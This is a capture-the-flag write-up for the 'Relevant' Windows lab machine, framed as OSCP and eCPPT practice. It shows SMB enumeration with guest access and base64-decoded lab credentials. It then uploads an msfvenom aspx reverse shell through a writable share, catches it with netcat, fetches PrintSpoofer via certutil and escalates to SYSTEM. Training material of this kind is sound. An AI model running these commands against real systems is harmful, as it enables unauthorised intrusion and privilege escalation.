Relevant is a medium difficulty challenge that sticks to the basics and reminds the attacker that focus on their methodology and it will work. This challenge specifically is great practice for both OSCP and for eCPPT as well. The challenges contained within is useful to perfect and is important to practice for further certifications.
In saying that, the below write up is a guide in tackling the challenge in a methodical way.
Relevant Write up
Back to basics and more!
Target Network Report
Name of Target:
# NMAP SCAN
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
The first port to tackle will usually be the webservice on port 80. The information that is gathered from this will normally be vital to understanding the target and the likely attack vectors.
Unfortunately in this case the webservice displayed is the default Microsoft IIS page that shows the web page as incomplete. Running a directory scanner is important in these scenarios as there might be hidden files or directories to uncover.
-n : No recursion
-w $FILE : Wordlist
-u $RHOST: Victim
feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.243.48
After running Feroxbuster, no results returned and meaning this port is likely a dead end for now.
Port 135,139 and 445 are all related to SMB-like services. SMB is quick to enumerate and allows quick wins if there is misconfigurations. The preferred method is to enumerate and understand what information is possible from the open port. In this instance, CrackMapExec is the perfect tool and the following is the normal checks in order:
crackmapexec smb $RHOST -u '' -p '' :Test for null shares
crackmapexec smb $RHOST -u 'administrator' -p '' :Test for administrator null password
crackmapexec smb $RHOST -u 'guest' -p '' :Test for guest null password
In this instance, the above shows that 'guest' has a null password so there is access available there (note the plus sign is CrackMapExecs way of visually showing success). This tool is also great for a quick check on whether signing is disabled or enabled. This is important for NTLM Relay attacks and should be kept in the back of the mind for later. This may not be useful with this challenge due to being a single target and not additional targets that communicate but it is important to note regardless.
Moving along, it is possible with CME to enumerate shares and uncovers READ,WRITE access for the "Guest" account
cme smb $RHOST -u 'guest' -p '' --shares
With CME confirming shares visible for guest, Next logical step is to log in and search around. In doing so, a passwords.txt is uncovered
smbclient //$RHOST/$SHAREfolder -U "guest"
The passwords.txt file contained credentials that were encoded in base64.
echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
#Bob - !P@$$W0rD!123
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
#Bill - Juw4nnaM4n420696969!$$$
With these credentials, it is important to take note for later use. It may be a trap to create a distraction and is important to keep in mind. Attempting to use these on Port 3389 Remote Desktop, fails and proves that the credentials are not important right now.
After hitting the roadblock and being blinded with credentials; it is important to 'reset' and review the scanned information available. In this instance, many may not do a full port scan and likely miss these larger uncommon ports.
The focus now shifts to the larger port numbers that were found. Port 49663 shows up as an HTTP service and it makes sense to go have a look. This returns to a Microsoft IIS default page however as this service runs on a different port; then sticking to methodology and doing a directory bust is the likely best step in sticking to the basics.
Running feroxbuster this time discovers the directory /nt4wrksv path that was exactly the same as the SMB share. The page loads with a 200 code with nothing displayed. Given that it has teh same name as the SMB share, testing could start with files found.
Test to see if files are accessible such as "passwords.txt"
Recalling that the user "guest" has READ/WRITE privileges to this share is important as the likely next step is to exploit having the ability to call on a file from the webservice. In saying that, after testing that the upload feature works; it is time to exploit the service with a payload. The service is a Microsoft IIS web service and normally runs with the extension .asp and .aspx rather than .php.
It is important to tailor the payload to this fact.
- Likely windows 2016 and architexture is likely x64
- IIS server accepts .asp or .aspx files and .php will not be likely to work
msfvenom -p windows/x64/shell_reverse_tcp lhost=$LHOST lport=$LPORT -f aspx -o shell.aspx
#SMB - Upload
smbclient //$RHOST/nt4wrksv -u 'guest'
nc -lvnp 4444
curl http://$RHOST:49663/nt4wrksv/shell.aspx :or just visit the webpage 10.10.6.134:49663/nt4wrksv/shell.aspx
With the successful reverse shell, we are the service defaultapppool (Microsft IIS) with low privileges. It is possible to attain the userflag at this point.
Moving forward it is important to enumerate further misconfigurations. Running the command will display the groups that user is a part of and privileges as well:
From this it is important to understand that there is a variety of different privileges that are vulnerable however SeImpersonatePrivileges are sometimes a golden goose in terms of privilege escalation vectors. There is a variety of ways that this can be exploited.
- Metasploit has a module "Incognito" and if the shell used is successful with a meterpreter shell, then it becomes trivial by loading "Incognito" and impersonating the correct token of a higher privilege account.
- Additionally, Potato attacks are also doing the same thing with impersonations but these attacks normally rely on DCOM being enabled and this particular target has it disabled.
- Finally, after searching we find PrintSpoofer that takes advantage SeAssignPrimaryToken or SeImpersonate privilege tokens.
If interested, have a read of the following to understand what is happening behind the scenes: READ
Compiling this tool is straight forward and then the next step is to upload and exploit. The tool was an immediate NT/System user with the highest privileges.
git clone https://github.com/dievus/printspoofer.git
python -m SimpleHTTPServer 80
#TRANSFER, Run from victim machine
certutil -urlcache -f http://$RHOST/printspoofer.exe printspoofer.exe
.\printspoofer.exe -i -c cmd
The tool is a great asset for token impersonation and made it trivially easy to escalate privileges. The difficulty lies with finding out that DCOM is disabled within the enumeration phase and it may cause headaches by attempting potato attacks and such and not understanding why it is not working.
Overall this featured a trap to mess with the attackers rythm and methodology; directory busting in both port 80 and port 49663 serving as a reminder to always stick with the plan and revert to basics when stuck. Finally it is token impersonation again serving as a reminder to stick with the basics. Find out what system is being dealt with and then once exploited, find out what this exploited user can do.
And finally, if you enjoyed the content and want to see more; feel free to feed the addiction. 👌